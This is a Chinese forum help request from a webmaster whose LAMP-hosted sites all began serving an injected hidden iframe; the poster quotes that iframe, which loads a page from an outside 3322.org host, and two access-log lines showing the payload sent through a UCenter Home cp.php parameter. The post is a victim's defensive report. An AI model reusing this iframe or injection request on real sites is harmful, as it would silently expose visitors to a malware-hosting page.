求助：服务器被挂马，UCH有被攻击的迹象

tearszhu

昨天服务器上所有的网站突然被挂上一段代码

1. <iframe src=http://se362c.3322.org/jj/7.htm width=111 height=0 border=0></iframe>      

复制代码

首先排除了是本地网络的问题，在其他地方也出现相同的情况，而本地访问其他网站没有问题。\r\n所有在服务器上的文件都会出现那一行代码，包括404页面\r\n而直接在服务器上下载下来的文件上没有出现那一行代码\r\n如果把一个空的文件上传到服务器上，通过网络访问该文件，都会加上那一行代码\r\n\r\n查找日志时发现，日志1G多，日志中有两行是与该代码有关

1. \r\nlogs/access_log:218.28.249.222 - - [23/Sep/2009:17:01:58 +0800] \"GET /cp.php?ac=relatekw&subjectenc=\\xc8\\xc3\\xd0\\xc4\\xc1\\xe9\\xb4\\xf8\\xd7\\xc5\\xce\\xd2\r\n\r\n\\xc3\\xc7\\xd7\\xdf\\xcf\\xf2\\xc0\\xed\\xcf\\xeb\\xb5\\xc4\\xc9\\xfa\\xbb\\xee\\xc8\\xc3\\xd0\\xc4\\xc1\\xe9\\xb4\\xf8\\xd7\\xc5\\xce\\xd2\\xc3\\xc7\\xd7\\xdf\\xcf\\xf2\\xc0\\xed\\xcf\\xeb\\xb5\r\n\r\n\\xc4\\xc9\\xfa\\xbb\\xee&messageenc=<IFRAME%20border=0%20src=\\\"http://se362c.3322.org/jj/7.htm\\\"%20width=111%20height=0></IFRAME><STYLE>body%20{%20font-\r\n\r\nsize:14px;%20line-height:1.8em;%20padding-right:%204px;%20padding-left:%208px;%20padding-bottom:%208px;%20margin:%200px;%20padding-top:%208px;%20}\r\n\r\n</STYLE><META%20content=\\\"mshtml%206.00.2900.3132\\\"%20name=generator>&inajax=1 HTTP/1.1\" 200 76\r\n\r\n\r\n\r\n\r\nlogs/access_log:218.28.249.222 - - [23/Sep/2009:17:02:01 +0800] \"GET /cp.php?ac=relatekw&subjectenc=\\xc8\\xc3\\xd0\\xc4\\xc1\\xe9\\xb4\\xf8\\xd7\\xc5\\xce\\xd2\r\n\r\n\\xc3\\xc7\\xd7\\xdf\\xcf\\xf2\\xc0\\xed\\xcf\\xeb\\xb5\\xc4\\xc9\\xfa\\xbb\\xee&messageenc=<IFRAME%20border=0%20src=\\\"http://se362c.3322.org/jj/7.htm\\\"%20width=111%\r\n\r\n20height=0></IFRAME><STYLE>body%20{%20font-size:14px;%20line-height:1.8em;%20padding-right:%204px;%20padding-left:%208px;%20padding-bottom:%208px;%\r\n\r\n20margin:%200px;%20padding-top:%208px;%20}</STYLE><META%20content=\\\"mshtml%206.00.2900.3132\\\"%20name=generator>&inajax=1 HTTP/1.1\" 200 76

复制代码

不知是否与UCH有关，请达人帮忙，感谢。\r\n\r\n服务器环境是Lamp